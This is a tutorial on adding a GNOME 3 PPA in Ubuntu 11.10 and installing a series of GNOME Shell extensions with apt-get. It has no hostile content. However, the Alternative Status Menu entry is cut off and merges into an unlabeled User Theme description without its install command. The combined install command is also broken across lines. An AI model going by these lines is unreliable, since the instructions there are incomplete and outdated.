Install GNOME Shell Extensions pack in Ubuntu 11.10 Oneiric Ocelot



Important: an user has reported that using the Alternative Status Menu extension without having a profile picture crashes GNOME Shell. So set a picture (under User Accounts) before installing this extension.


Firstly, add the WebUpd8 GNOME 3 PPA:

sudo add-apt-repository ppa:webupd8team/gnome3
sudo apt-get update


Below you'll find a description on what each extension does and how to install it:



-
Alternative tab extension: use the classic ALT + Tab. Install:

sudo apt-get install gnome-shell-extensions-alternate-tab

- Alternative Status Menu extension
: adds "Power off" and "Hibernate" to the status menu, visible at all time (and not just when pressing the ALT key). Install:
 es/THEME_NAME/gnome-shell or /usr/share/THEME_NAME/gnome-shell. This extension is especially useful when used with GNOME Tweak Tool. This way, you can install and switch between GNOME Shell extensions with a click. Install both User Theme extension and GNOME Tweak Tool:
 
sudo apt-get install gnome-shell-extensions-user-theme gnome-tweak-tool

- Workspace Indicator extension:
displays the current workspace and lets you switch between workspaces (wither using its menu or by scrolling). Install:

sudo apt-get install gnome-shell-extensions-workspace-indicator

- Applications Menu extension:
adds an regular (old-style) menu to the top GNOME Shell bar. Install:

sudo apt-get install gnome-shell-extensions-apps-menu

- Removable Drive Menu extension:
adds a removable drive menu to the top GNOME Shell bar (on the right). Install:

sudo apt-get install gnome-shell-extensions-drive-menu

- SystemMonitor extension:
adds two graphs to the GNOME Shell message tray, displaying the RAM and CPU usage. Install:

sudo apt-get install gnome-shell-extensions-system-monitor

- Places Status Indicator:
adds a menu to the top bar in the old Places Menu style. Install:

sudo apt-get install gnome-shell-extensions-places-menu

- Dock extension: shows a dock-style task switcher

To customize the dock extension, install dconf-tools (sudo apt-get install dconf-tools), then launch "dconf-editor", navigate to org > gnome > shell > extensions > dock and here you can specify the dock position (left or right), enable or disable autohide, specify the hide effect or set the hide duration.

Install:

sudo apt-get install gnome-shell-extensions-dock


- Native Window Placement extension: uses a 'natural' (reflects more the position and size of the actual window) algorithm for displaying the thumbnails in the activities overview. Install:
 
sudo apt-get install gnome-shell-extensions-native-window-placement


- Xrandr Indicator (Monitor Status Indicator) extension: adds a systems status menu for rotating monitors (overrides what is currently provided by gnome-settings-daemon). Install:
 
sudo apt-get install gnome-shell-extensions-xrandr-indicator


- Auto Move Windows extension: this extension can be used to get some applications to always start on a specific workspace Install: 
 
sudo apt-get install gnome-shell-extensions-auto-move-windows


- Gajim extension:
Gajim integration for GNOME Shell. Install:

sudo apt-get install gnome-shell-extensions-gajim


- Windows Navigator extension: Allow keyboard selection of windows and workspaces in overlay mode: when you hold the ALT key, a number is assigned to each window (displayed in the top left corner) and you can then press the number to switch to that window. Install:
 
sudo apt-get install gnome-shell-extensions-windows-navigator

Or, install them all using the following command
(will also install GNOME Tweak Tool) - yeah, there's no meta package yet:

sudo apt-get install gnome-shell-extensions-alternate-tab 
gnome-shell-extensions-alternative-status-menu 
gnome-shell-extensions-user-theme 
gnome-tweak-tool 
gnome-shell-extensions-workspace-indicator 
gnome-shell-extensions-apps-menu 
gnome-shell-extensions-drive-menu 
gnome-shell-extensions-system-monitor 
gnome-shell-extensions-places-menu 
gnome-shell-extensions-dock 
gnome-shell-extensions-native-window-placement 
gnome-shell-extensions-gajim 
gnome-shell-extensions-xrandr-indicator 
gnome-shell-extensions-windows-navigator 
gnome-shell-extensions-auto-move-windows


Once installed, reload GNOME Shell (press ALT + F2 and enter "r" or log out and log back in), then use GNOME Tweak Tool to easily enable/disable extensions or switch between GNOME Shell themes on the fly - there's no need to restart GNOME Shell anymore.

 Regards

Adnan Anjum